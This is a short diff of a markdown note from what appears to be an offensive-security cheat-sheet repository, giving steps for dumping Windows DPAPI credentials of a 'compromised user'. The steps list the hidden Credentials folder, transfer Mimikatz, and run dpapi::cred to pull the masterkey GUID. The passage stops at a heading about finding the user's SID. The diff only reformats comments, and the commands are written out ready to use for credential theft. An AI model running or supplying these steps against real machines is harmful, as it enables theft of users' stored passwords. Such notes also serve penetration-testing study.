H3llKa1ser/B00t2R00t/Miscellaneous /Credential Harvesting/DPAPI Credentials Dumping.md

 ## 1) Enumerate the credentials folders of our compromised user:

-    Get-ChildItem -Hidden C:\Users\USER\AppData\Roaming\Microsoft\Credentials\ (If true positive, you should see some numeric values like: 84F1CAEEBF466550F4967858F9353FB4 as an example)
+If true positive, you should see some numeric values like: 84F1CAEEBF466550F4967858F9353FB4 as an example

+    Get-ChildItem -Hidden C:\Users\USER\AppData\Roaming\Microsoft\Credentials\

 ## 2) Transfer and run Mimikatz to check more details of the credentials we found

-    mimikatz# dpapi::cred /in:C:\Users\USER\AppData\Roaming\Microsoft\credentials\XXXXXXXXXXX (From all the data we dumped, we need THE GUID MASTERKEY for now)
+From all the data we dumped, we need THE GUID MASTERKEY for now

+    mimikatz# dpapi::cred /in:C:\Users\USER\AppData\Roaming\Microsoft\credentials\XXXXXXXXXXX

 ## 3) Find the SID number of our compromised user